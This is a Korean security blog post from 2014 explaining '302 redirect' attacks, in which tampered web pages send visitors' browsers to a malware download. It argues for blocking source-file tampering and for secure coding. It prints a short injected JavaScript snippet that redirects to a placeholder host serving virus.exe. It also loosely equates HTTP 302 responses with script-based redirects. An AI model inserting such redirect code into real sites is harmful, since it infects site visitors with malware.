taeho's life logger

302 리다이렉트 공격기법에 대하여 본문

서버보안

302 리다이렉트 공격기법에 대하여

taeho Tae-Ho 2014.09.04 13:54

최근 "302 리다이렉션 공격"이라는 해킹이 유행하고 있는 듯 합니다. 마치 새로운 대단한 공격 기법인 것처럼 호들갑을 떨지만 이것은 새로운 공격 기법은 아닙니다. 홈페이지를 변조하거나 웹 브라우저가 요청한 웹페이지에 대해 특정 자바스크립트 코드를 삽입하여 클라이언트 PC의 웹 브라우저가 악성코드를 다운로드 받게 하는 하는 수많은 공격 기법과 전혀 다를 바가 없는 일반적인..흔하디 흔한 공격 기법 입니다.


다만 302 리다이렉션은 수많은 네트워크 보안솔루션들을 우회하기 위해 등장한 변종 기법이라는 점입니다. 홈페이지의 소스파일의 위/변조를 원천적으로 차단하면 보다 강력한 보안이 이루어질 텐데 네트워크 수준에서...또는 웹 서버의 설정을 변경하여 외부URL을 포함하거나 외부 서버에 있는 파일의 다운로드 링크의 동작을 차단하다 보니 해커들이 이젠 아예 접속한 클라이언트 PC의 브라우저를 다른 웹페이지로 완전히 전환(리다이렉션 : Redirection) 시켜버리기 시작한 것입니다.


이전과 같이 클라이언트 PC를 악성코드에 감염시키기 위한 공격의 과정에서 웹서버의 소스파일을 변조하는 공격이 선행된다는 점에는 변함이 없습니다. 즉, 웹 소스 파일의 위/변조를 원천적으로 차단하지 않는 한 이러한 변형 공격 기법은 지속적으로 등장할 것입니다. (당연히 기본적으로 시큐어 코딩은 적용되어야 합니다.)


원리는 다음과 같습니다.


302 Redirection Attack302 Redirection Attack


HTTP 프로토콜에서 지원하고 있는 응답코드 302가 브라우저의 주소를 다른 주소로 Redirect 하게 되는데 이 원리를 이용하여 악성코드를 다운로드 받는 URL로 강제로 전환 시켜 버리는 기법이 바로 302 리다이렉션 공격 입니다.


이 302 리다이렉션이 특별히 위험한 이유는 파밍 공격처럼 사용자가 자신이 실행하고 접속한 사이트를 보여주는 웹 브라우저가 다른 곳으로 전환(리다이렉션)되었다는 것을 전혀 인지하지 못할 수 있기 때문입니다. 이는 해커가 사용자가 접속한 웹페이지에 다음과 유사한 형태의 리다이렉션 코드(java script 혹은 meta 태그)를 추가(변조)하였기 때문입니다.


<script language=JavaScript>

Location.href = http://cdn.hack.com/virus.exe;

</script>


위에서 Location.href 를 지정하는 부분이 바로 302 리다이렉션을 유도하는 부분입니다. 해커가 원본 웹페이지 소스에 추가한 짧은 3줄의 Java Script 코드는 웹페이지에 숨어있다가 웹페이지에 접속한 사용자의 웹브라우저로 전달되고 웹 브라우저는 위의 Location.href 를 만나는 순간..... 사용자에게 "묻지도 따지지도 않고" 브라우저를 지정된 웹페이지로 이동(리다이렉션)시켜 버립니다.때문에 사용자는 그 사실을 모를 가능성이 높습니다.


이러한 302 리다이렉션을 사용자의 웹브라우저에서 막을 수 있는 방법은 현재로서는 없습니다. 가장 좋은 방법이 웹서버의 소스파일 위변조를 차단하는 것이며 웹 소스 변조를 통해 시도하는 302 리다이렉션과 다른 공격들을 원천적으로 방어할 수 있습니다. 그리고 시큐어코딩을 통해 웹페이지 소스 수준에서의 취약성을 제거한다면 대부분의 웹서버는 해킹으로부터 안전할 수 있습니다. 물론 DDOS와 같은 서비스 거부 공격은 예외겠지만 말입니다.


관련된 글 보기

웹서버 소스 위변조 방어를 위한 SecureOS 적용에 대한 포스트 보기



신고
1 Comments
댓글쓰기 폼